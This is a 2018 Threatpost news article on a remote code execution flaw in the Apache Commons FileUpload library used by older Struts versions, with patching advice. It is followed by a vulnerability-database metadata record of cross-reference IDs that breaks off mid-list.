Apache Struts Warns Users of Two-Year-Old Vulnerability

2018-11-06T12:27:15

Description

The Apache Software Foundation warned in an advisory that the latest version of the Commons FileUpload library is susceptible to a two-year-old remote code execution flaw. Users of the vulnerable library must update their projects manually. The critical bug in Commons FileUpload library is a known vulnerability ([CVE-2016-1000031](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>)) that enables remote code execution in the open-source framework, which facilitates developing web applications in the Java programming language. Essentially a Java Object exists in the Apache Commons FileUpload library that can be manipulated so that when it is deserialized, it can write or copy files to disk in arbitrary locations. “A remote attacker could exploit this vulnerability to take control of an affected system,” according to the Monday [advisory](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>). “Your project is affected if it uses the built-in file upload mechanism of Struts 2, which defaults to the use of commons-fileupload. The updated commons-fileupload library is a drop-in replacement for the vulnerable version. Deployed applications can be hardened by replacing the commons-fileupload jar file in WEB-INF/lib with the fixed jar.” The vulnerable commons-fileupload library is used in Apache Struts versions 2.3.36 and prior, the Foundation said in a Monday advisory. They urged users to upgrade to the latest released version of Commons FileUpload library – which is 1.3.3. The vulnerability is reminiscent of [CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>), another critical remote code execution Apache vulnerability behind the massive 2017 Equifax breach that led to the compromise of 143 million Americans’ data. While that Apache Struts vulnerability (impacting the Jakarta based file upload Multipart parser) was patched back in March 2017, the consumer credit reporting agency didn’t apply patches for two months after the flaw’s disclosure – eventually leading to the groundbreaking breach. Similarly, this latest deserialization vulnerability was disclosed and patched in commons-fileupload in [March,](<https://issues.apache.org/jira/browse/FILEUPLOAD-279>) but since then a new version of Struts that became available – the 2.3.36 version, which was released in October – has touted vulnerable versions of the library. Struts versions from 2.5.12 are not affected, as this newer version of Struts includes a patched commons-fileupload component. Users can fix the risk by replacing the faulty library manually. “There is no simple ‘new Struts version’ to fix this,” said Johannes Ullrich, dean of research at the SANS Institute, in a blog [post](<https://isc.sans.edu/diary/rss/24278>) on Monday. “You will have to swap out the commons-fileupload library manually.” “And while you are at it: Double check that you don’t have any other copies of the vulnerable library sitting on your systems,” he added. “Struts isn’t the only one using it, and others may have neglected to update it as well.” It is only the latest security issue to afflict Apache Struts – earlier in August for instance, a critical remote code-execution vulnerability in Apache Struts 2 was [disclosed](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>).

{"id": "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Apache Struts Warns Users of Two-Year-Old Vulnerability", "description": "The Apache Software Foundation warned in an advisory that the latest version of the Commons FileUpload library is susceptible to a two-year-old remote code execution flaw. Users of the vulnerable library must update their projects manually.\n\nThe critical bug in Commons FileUpload library is a known vulnerability ([CVE-2016-1000031](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>)) that enables remote code execution in the open-source framework, which facilitates developing web applications in the Java programming language.\n\nEssentially a Java Object exists in the Apache Commons FileUpload library that can be manipulated so that when it is deserialized, it can write or copy files to disk in arbitrary locations.\n\n\u201cA remote attacker could exploit this vulnerability to take control of an affected system,\u201d according to the Monday [advisory](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>). \u201cYour project is affected if it uses the built-in file upload mechanism of Struts 2, which defaults to the use of commons-fileupload. The updated commons-fileupload library is a drop-in replacement for the vulnerable version. Deployed applications can be hardened by replacing the commons-fileupload jar file in WEB-INF/lib with the fixed jar.\u201d\n\nThe vulnerable commons-fileupload library is used in Apache Struts versions 2.3.36 and prior, the Foundation said in a Monday advisory. They urged users to upgrade to the latest released version of Commons FileUpload library \u2013 which is 1.3.3.\n\nThe vulnerability is reminiscent of [CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>), another critical remote code execution Apache vulnerability behind the massive 2017 Equifax breach that led to the compromise of 143 million Americans\u2019 data.\n\nWhile that Apache Struts vulnerability (impacting the Jakarta based file upload Multipart parser) was patched back in March 2017, the consumer credit reporting agency didn\u2019t apply patches for two months after the flaw\u2019s disclosure \u2013 eventually leading to the groundbreaking breach.\n\nSimilarly, this latest deserialization vulnerability was disclosed and patched in commons-fileupload in [March,](<https://issues.apache.org/jira/browse/FILEUPLOAD-279>) but since then a new version of Struts that became available \u2013 the 2.3.36 version, which was released in October \u2013 has touted vulnerable versions of the library.\n\nStruts versions from 2.5.12 are not affected, as this newer version of Struts includes a patched commons-fileupload component.\n\nUsers can fix the risk by replacing the faulty library manually.\n\n\u201cThere is no simple \u2018new Struts version\u2019 to fix this,\u201d said Johannes Ullrich, dean of research at the SANS Institute, in a blog [post](<https://isc.sans.edu/diary/rss/24278>) on Monday. \u201cYou will have to swap out the commons-fileupload library manually.\u201d\n\n\u201cAnd while you are at it: Double check that you don\u2019t have any other copies of the vulnerable library sitting on your systems,\u201d he added. \u201cStruts isn\u2019t the only one using it, and others may have neglected to update it as well.\u201d\n\nIt is only the latest security issue to afflict Apache Struts \u2013 earlier in August for instance, a critical remote code-execution vulnerability in Apache Struts 2 was [disclosed](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>).\n", "published": "2018-11-06T12:27:15", "modified": "2018-11-06T12:27:15", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://threatpost.com/apache-struts-warns-users-of-two-year-old-vulnerability/138820/", "reporter": "Lindsey O'Donnell", "references": ["http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E", "http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E", "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "https://issues.apache.org/jira/browse/FILEUPLOAD-279", "https://isc.sans.edu/diary/rss/24278", "https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/"], "cvelist": ["CVE-2016-1000031", "CVE-2017-5638", "CVE-2019-11043"], "immutableFields": [], "lastseen": "2019-10-30T07:20:19", "viewCount": 818, "enchantments": {"score": {"value": 1.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "almalinux", "idList": ["ALSA-2019:3735", "ALSA-2019:3736"]}, {"type": "amazon", "idList": ["ALAS-2019-1315", "ALAS2-2019-1344"]}, {"type": "apple", "idList": ["APPLE:57687011D0766424B56EB268957F8A8B", "APPLE:HT210919"]}, {"type": "archlinux", "idList": ["ASA-201910-14"]}, {"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CRUC-8382", "ATLASSIAN:CWD-4879", "ATLASSIAN:FE-7164", "ATLASSIAN:FE-7345", "BAM-18242", "CRUC-8382", "CWD-4879", "FE-7164", "FE-7345"]}, {"type": "attackerkb", "idList": ["AKB:1A028E9F-233B-47D8-8C85-FD179A3627EC", "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "centos", "idList": ["CESA-2019:3286", "CESA-2019:3287"]}, {"type": "cert", "idList": ["VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0197", "CPAI-2017-0676", "CPAI-2018-1066", "CPAI-2019-0232", "CPAI-2019-1453"]}, {"type": "cisa", "idList": ["CISA:848AFE845B4D41B0B59F2090C2571363"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2017-5638", "CISA-KEV-CVE-2019-11043"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2", "CISCO-SA-20181107-STRUTS-COMMONS-FILEUPLOAD"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2016-1000031", "CVE-2017-5638", "CVE-2019-11043"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1970-1:E007F", "DEBIAN:DSA-4552-1:9E828", "DEBIAN:DSA-4553-1:8D47C"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-1000031", "DEBIANCVE:CVE-2019-11043"]}, {"type": "exploitdb", "idList": ["EDB-ID:47553"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9F633F41C64CB6F19F95C80592ADA235"]}, {"type": "f5", "idList": ["F5:K25206238", "F5:K43451236", "F5:K75408500"]}, {"type": "fedora", "idList": ["FEDORA:314A160963EE", "FEDORA:E3A496077836", "FEDORA:E83286076F61"]}, {"type": "freebsd", "idList": ["6A7C2AB0-00DD-11EA-83CE-705A0F828759", "C1265E85-7C95-11E7-93AF-005056925DB4", "D70C9E18-F340-11E8-BE46-0019DBB15B3F"]}, {"type": "gentoo", "idList": ["GLSA-201910-01"]}, {"type": "github", "idList": ["GHSA-7X9J-7223-RG5M", "GHSA-J77Q-2QQG-6989", "GITHUB:0519EA92487B44F364A1B35C85049455"]}, {"type": "githubexploit", "idList": ["37252618-7152-5162-BF75-250EE342CB49", "391F4CAB-3936-5680-ABC7-E2BAC6F388E1", "4CD5443F-B7DE-59CB-A1DB-A86A9195A110", "552AB4A5-9474-5375-9A1E-7A4EFC3238D2", "6472B526-9541-56D3-B098-8199F554937C", "6E11EB2E-EFDA-5C6C-B822-245A4F08AFAA", "731BC7EF-75BA-5918-AA70-493EB4F15C1A", "89603B6A-F23E-5950-B12D-D7D3AEF329CA", "89BF594C-672A-50D6-B92C-9813C1361242", "919729FB-143D-5088-981B-D27AD2B3F5D2", "927524F4-E84C-5F1F-B3F9-E65CE2A1FD21", "999BE14F-35F1-56A6-925F-BAAB2E141BE1", "DD9F5BE6-AA7E-55A9-9099-8CDE03A2ADEE", "DFB00902-0D20-56C6-8EF8-0D8351E62151", "E54F0CA1-3DDF-5A07-9863-1DDF42E4BFFB", "F7412832-C589-52D7-B910-DE4B7233DBD5"]}, {"type": "hackerone", "idList": ["H1:212022", "H1:212985", "H1:213069", "H1:720306", "H1:722327"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["02304D05D897B568E77C8953094F5914F389089362655D2AB68B096E3F3418DC", "0766EE3C620AAAF614D24B4B93352C6C94F10148776C7854787A45858D29E32F", "08325F6AA0E5D32062B70EC20B7BAC73EDD2082F6016AADE25F93CC5C5945E15", "1071929E319DA2301B42C192AD319E3B6E2E74FD95170F6C359D22224A6C2385", "16DB31010331CDA102555C2016C4A080DD57DFC6949CFC06DB82104E0598F7E9", "172E8A857C199BCE10B08A718612B7B83ED02952ADF1DE693EE2C676DADD4B46", "204ADCCC258487D6D5F8C848C95DAB38413055F4AFD05DFCF56FD7435CBF7C69", "245FEAF3E7F9444B5958781DC69E3F6A353E5088DBEDBC2BC099CD2EDEC0625E", "266AF5CCE2935A1632FAEA2AD2ADEC7D3B1EF6585030A41069E05308C44DE9B2", "28CBA14F2DF9254C1445C1338480DCFC0CE9E7605EA9BC20FEE2942EF21E34C9", "2B583BAC13559207D6199DBF313322FD679D7CAC25583ADB0D482CC288326F6B", "3029F9535BE20D2A199498B065F599F47A44CCD33B224D2192F5AE06C62BEDAF", "3D06AFAAD22542FA483AAC68D77E91B7A2B272972D4F386444B504CB4050B732", "440EFFCF162389547EC94BA431325D2B42D5E91C496765EE6F12A65170790BDA", "48F6A099D2817EC515107FFC49C4E17438FAC35AB50A0F0C6F0B86E2F20FECE3", "4C85D2930346AD967159AF4455A7D0489E2962948B89964DEEB838E940D0D79F", "4FDDAEF0B75E77A06B8D7597974820AA398F5338DCF044E51EA0222441200F4A", "546F05697B8F700EEF28B598121A8A3351E168124EB0852E39278EAE7A99C11B", "5E963A16D56492D265E3AD4BB10050F73E3DA9DE70902074CA74AFF7B978ADBF", "6090C932221E51ADB229897A416B6CCCF4B92380897751F9E9E7D222C5B6F5AC", "6109AF1F8D1815678E61E353B816288D20DB8DD1D5C49536DF782435D85C01D2", "6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "65C6CEE2220BD8F2BF06A7DA52FAE31B05C72037D4DF4346A594A14F3DBA2AF1", "681418AA2780D10FE3FE75923CF33BFCB1F9F3C8FD6FEF47FC5127CBC92BB2A5", "6F9B3E5D97FDBB41059AA8C4DDC3F8C6E337642756FF537C16A61C7599D523B9", "70F7C16B884F3CA0489B9235F3CDA3FE2C0B53C46BD3767440928787F2FADAF1", "71763DB8BA3B87C5175E4ED1BF88B5F20D4D7107BB02006612C8229371E7C9F4", "75D402B2CEA61D69C553141E08DFD9743DA1DE8E0FE50384A99E9AD4F4E5B618", "76322F4FDE913CCFF696E95021198B9D1B68711EA0FBA9EE3CF9E433336206FD", "77352C82A30EA733694B5D88C0D7D12ED4F6B39811776EF99E8E73A7C6CD693F", "7948B558E9BBB9D7B19D137E1C7944C490BD5D26DB24595F235B080A97AD570E", "795D3F68D07925B1C9C765AAF8DA73C30C8A6490AD9D7941029C418A30C9FF2C", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D", "7EFB522319684542D37BC81717D35991CE91F1752F5381EA6BFA2B84165FC89C", "829888007050D9C11A7557C40DBAAED034B1097EC4A906EEC0D336ABDA0D0B50", "868FA6DB6C0D6319E1B3081CCB6B4C3817A1853F87C138E75E8C43A455725423", "8A242C548ADF3E615FE6BA32C7E6F5B2DB8B1FA250ABF2329DC20A0FB32D3700", "8D7ED64456FC169D02750D2AA4A80B16FFC334A2DA71875B22768979B26CAC67", "93AF3A0CB685837B7C985687A86604D2436D2B5919B3C105E801C3ADABAF8404", "95CD62FEDAEA72A3108F90B80812DA1D38B9D58498C1F872BB283E27B2E4A609", "987312D6FC46CA3F269FCE6582D23DFEE688D79E6FE8D1293ED88A90F27657C7", "9885EF692D10F55B10165D028D563DA2E874C62358D512573E854BC6EF0EF9FE", "9BE1D889C1BD77682655EB00AA0EE21AA5C7CCAA1F93287BB788D1CFC12BBD77", "9CEBA1B39CCB6811A505F9227D3A8589890E3374E0755D8A3C0854B9E7E74B4F", "9ED959A552F1F1135D021720BFEF601A33E4FF298A735DCF0648EF0558E731A9", "A4EB252B4F9B1D9E6B670EA990F738AB583192588E1566F20330B6E3CFCB3AA1", "AA02BE79DCD02EDB1B362BC22E1303156066D6065A6A81B509F48BDDA3058239", "ACE26206FFB4E9BFC947C91835F27A6EA2B5E8DF0FF6B0C69F358731D4D9C900", "B09323FD9F65F6065C7B68F00028DEBB77D6AFCCF024832FCF79623893150BE7", "B30027B67E0900B9C9192B0EB28EA6D42DDFB696208646582631F912C14CE66F", "B8C124EE4E419DE7F41A9CB0246E9FF21300C4C9A2734EF999830B9906B65133", "BABF5F87446773F486C4241A55805D7AF675A10E3D8F7FB739A641C0B3FD8389", "BC4CE6FA6231522277B8CDD6EBE913273E804C9EC6F8EA56F64C54D931A5F0A3", "C222A8A891F504F40C914F8F66ABB73F5EF9BD26F781A02F39DE0DB06449374A", "C43D2CB156B7BD39FC113EAD22568306F95463D3E29CC3A697EB085F142533BB", "C9E756FDC2D170A759D074368FA581B4BDE59726C48E93D77387BFF9A0BD269B", "CD8271F1E3A620207AA3EAC35F944E1453EFEBC4728A88B9C3D9D0DA7F511F56", "D2C2FAA59189FC355096429F31F4AD0BE546851207D1F9D74226059031643143", "D33BBD3C5F74DBFB7700F90DA29C0A0F17319D5EFCD29BE614C5EEA53697BBA1", "D5934C683F70DCBE4AED04C1CC98975A5321914D3F2282A47A2535F0FC4F1834", "D769235D102AD19A73D51C968FFD8889D9656A19C29D4BE9C66233A668FC8B7A", "DCFA6D7AB52AF169B1D499DB1C9D17C7F39B1072C153E7A30D2D516406BC7458", "E143583639D054AA8FE69FA00A9B2C711903F95581EE6F26FFBD1FCD98532960", "EFAFEB4BBDCD09CB8092BF34BF1DF6E8940256BA8189C4734656E48E9BEAB09A", "F1072FE090DABD963C764C2E009454B24AB02021B54C8519F4195C5ABC6E2FF5", "F4B9D71D3FABEC6658928AA2A337B66B863636EDAA889DCF19CDC196449826D5", "FB301BD274079F5B2C88A19B0C86981A277D606738CBEB57758A65ED178BA0FC", "FB50FC72D1ADF03C64135E473D71F8FDDDF0FBB202D69511A7EA94874CC168D1"]}, {"type": "ics", "idList": ["AA20-133A"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "IMPERVABLOG:697E34BE77BECD65BF763ECF92DD1B9F", "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:70B3C77A2DC5965EB28755E5F9FD9BFD", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:CD196CDD794CCCE3719A9D38DA5BE417", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:4611207874033525364", "KITPLOIT:5052987141331551837", "KITPLOIT:5230099254245458698", "KITPLOIT:5420210148456420402", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-APACHE-STRUTS-OPEN-SOURCE-FRAMEWORK-REMOTE-CODE-EXECUTION-NOSID", "LENOVO:PS500093-NOSID"]}, {"type": "mageia", "idList": ["MGASA-2019-0307"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379", "MYHACK58:62201786819", "MYHACK58:62201890758", "MYHACK58:62201891264", "MYHACK58:62201993410"]}, {"type": "nessus", "idList": ["700055.PRM", "701235.PRM", "AL2_ALAS-2019-1344.NASL", "ALA_ALAS-2019-1315.NASL", "CENTOS8_RHSA-2019-3735.NASL", "CENTOS8_RHSA-2019-3736.NASL", "CENTOS_RHSA-2019-3286.NASL", "CENTOS_RHSA-2019-3287.NASL", "DEBIAN_DLA-1970.NASL", "DEBIAN_DSA-4552.NASL", "DEBIAN_DSA-4553.NASL", "EULEROS_SA-2019-2295.NASL", "EULEROS_SA-2019-2438.NASL", "EULEROS_SA-2019-2546.NASL", "EULEROS_SA-2019-2649.NASL", "EULEROS_SA-2020-1058.NASL", "EULEROS_SA-2020-1747.NASL", "FEDORA_2019-187AE3128D.NASL", "FEDORA_2019-4ADC49A476.NASL", "FEDORA_2019-7BB07C3B02.NASL", "FREEBSD_PKG_6A7C2AB000DD11EA83CE705A0F828759.NASL", "FREEBSD_PKG_C1265E857C9511E793AF005056925DB4.NASL", "FREEBSD_PKG_D70C9E18F34011E8BE460019DBB15B3F.NASL", "GENTOO_GLSA-201910-01.NASL", "MACOS_HT210919.NASL", "MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL", "NEWSTART_CGSL_NS-SA-2019-0214_PHP.NASL", "NEWSTART_CGSL_NS-SA-2020-0001_PHP.NASL", "NEWSTART_CGSL_NS-SA-2020-0018_PHP.NASL", "OPENSUSE-2019-1399.NASL", "OPENSUSE-2019-2441.NASL", "OPENSUSE-2019-2457.NASL", "OPENSUSE-2021-1130.NASL", "OPENSUSE-2021-2575.NASL", "OPENSUSE-2021-2637.NASL", "OPENSUSE-2021-2795.NASL", "ORACLELINUX_ELSA-2019-3286.NASL", "ORACLELINUX_ELSA-2019-3287.NASL", "ORACLELINUX_ELSA-2019-3735.NASL", "ORACLELINUX_ELSA-2019-3736.NASL", "ORACLE_BI_PUBLISHER_APR_2020_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_CPU_JAN_2021.NASL", "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_APR_2019_CPU.NASL", "ORACLE_OATS_CPU_JUL_2019.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_APR_2019.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_APR_2019.NASL", "ORACLE_RDBMS_CPU_JUL_2020.NASL", "ORACLE_WEBCENTER_PORTAL_CPU_APR_2019.NBIN", "ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL", "ORACLE_WEBCENTER_SITES_JUL_2019_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CVE-2017-9805.NBIN", "PHP_7_3_11.NASL", "PHP_7_4_0.NASL", "PHP_RCE_CVE_2019_11043.NBIN", "REDHAT-RHSA-2019-3286.NASL", "REDHAT-RHSA-2019-3287.NASL", "REDHAT-RHSA-2019-3735.NASL", "REDHAT-RHSA-2019-3736.NASL", "REDHAT-RHSA-2020-0322.NASL", "REDHAT-RHSA-2020-2835.NASL", "SECURITYCENTER_5_19_0_TNS_2021_08.NASL", "SECURITYCENTER_5_19_0_TNS_2021_14.NASL", "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "SL_20191031_PHP_ON_SL6_X.NASL", "SL_20191031_PHP_ON_SL7_X.NASL", "STRUTS_2_3_36_FILEUPLOAD.NASL", "STRUTS_2_5_10_1_RCE.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "STRUTS_2_5_12.NASL", "SUSE_SU-2019-14044-1.NASL", "SUSE_SU-2019-2809-1.NASL", "SUSE_SU-2019-2819-1.NASL", "SUSE_SU-2019-2909-1.NASL", "SUSE_SU-2020-0522-1.NASL", "SUSE_SU-2021-2564-1.NASL", "SUSE_SU-2021-2636-1.NASL", "SUSE_SU-2021-2637-1.NASL", "SUSE_SU-2021-2638-1.NASL", "SUSE_SU-2021-2795-1.NASL", "SUSE_SU-2022-4067-1.NASL", "UBUNTU_USN-4166-1.NASL", "VIRTUOZZO_VZLSA-2019-3286.NASL", "VIRTUOZZO_VZLSA-2019-3287.NASL", "WEBSPHERE_301027.NASL", "WEB_APPLICATION_SCANNING_112726", "WEB_APPLICATION_SCANNING_98766", "WEB_APPLICATION_SCANNING_98767", "WEB_APPLICATION_SCANNING_98768"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VULN-CVE2017-5638.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310108692", "OPENVAS:1361412562310108771", "OPENVAS:1361412562310140180", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310141398", "OPENVAS:1361412562310141668", "OPENVAS:1361412562310704552", "OPENVAS:1361412562310704553", "OPENVAS:1361412562310810748", "OPENVAS:1361412562310811244", "OPENVAS:1361412562310816617", "OPENVAS:1361412562310844212", "OPENVAS:1361412562310852501", "OPENVAS:1361412562310852763", "OPENVAS:1361412562310852842", "OPENVAS:1361412562310876958", "OPENVAS:1361412562310876962", "OPENVAS:1361412562310877110", "OPENVAS:1361412562310883127", "OPENVAS:1361412562310883128", "OPENVAS:1361412562310891970", "OPENVAS:1361412562311220192295", "OPENVAS:1361412562311220192438", "OPENVAS:1361412562311220192546", "OPENVAS:1361412562311220192649", "OPENVAS:1361412562311220201058", "OPENVAS:1361412562311220201747"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2017", "ORACLE:CPUAPR2019", "ORACLE:CPUAPR2020", "ORACLE:CPUJAN2019", "ORACLE:CPUJAN2020", "ORACLE:CPUJAN2021", "ORACLE:CPUJUL2017", "ORACLE:CPUJUL2019", "ORACLE:CPUJUL2020", "ORACLE:CPUOCT2016", "ORACLE:CPUOCT2018", "ORACLE:CPUOCT2019", "ORACLE:CPUOCT2020", "ORACLE:CPUOCT2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-3286", "ELSA-2019-3287", "ELSA-2019-3735", "ELSA-2019-3736", "ELSA-2020-1112"]}, {"type": "osv", "idList": ["OSV:DLA-1970-1", "OSV:DSA-4552-1", "OSV:DSA-4553-1", "OSV:GHSA-7X9J-7223-RG5M", "OSV:GHSA-J77Q-2QQG-6989"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:156642"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B", "PENTESTIT:F5DFB26B34C75683830E664CBD58178F"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED", "QUALYSBLOG:1A5EE9D9F7F017B2137FF614703A8605", "QUALYSBLOG:5C311FA52DD78D7015076D492F321DB0", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:AB2325C5FBED5CF55517445600D470C1", "QUALYSBLOG:FAA1D7335127516FFE0506E88A2CC6C6"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhat", "idList": ["RHSA-2019:3286", "RHSA-2019:3287", "RHSA-2019:3299", "RHSA-2019:3300", "RHSA-2019:3724", "RHSA-2019:3735", "RHSA-2019:3736", "RHSA-2020:0322", "RHSA-2020:2835"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5638", "RH:CVE-2019-11043"]}, {"type": "rocky", "idList": ["RLSA-2019:3735", "RLSA-2019:3736"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:484D58D595B8F6CEE787306160971308", "SAINT:966010900F7632E797C552D31C2BB53A"]}, {"type": "seebug", "idList": ["SSV:92746", "SSV:92804"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1399-1", "OPENSUSE-SU-2019:2441-1", "OPENSUSE-SU-2019:2457-1"]}, {"type": "symantec", "idList": ["SMNTC-110608", "SMNTC-93604"]}, {"type": "talosblog", "idList": ["TALOSBLOG:991CC85C1D7CC3CD70110C7FAE123FAC", "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:33406DFBF4BACB74D00B9F929C1F4890", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:7FD924637D99697D78D53283817508DA", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:ACD3479531482E2CA5A8E15EB6B47523", "THN:AF93AEDBDE6169AD1163D53979A4EA04", "THN:B9AD1A8C118DBF486256A5AD0D9ECBE6"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "THREATPOST:23F7B700004D9E49820C4F500FFBF14C", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:71CFE98EE69CB32A2F1F115FCB3ACF21", "THREATPOST:7B2EAFA107D335014D553D78946C453E", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:AACAA4F654495529E053D43901F00A81", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:B3BA1E2BDAE404AB09829F90C4A42D56", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:DDB6E2767CFC8FF972505D4C12E6AB6B", "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB", 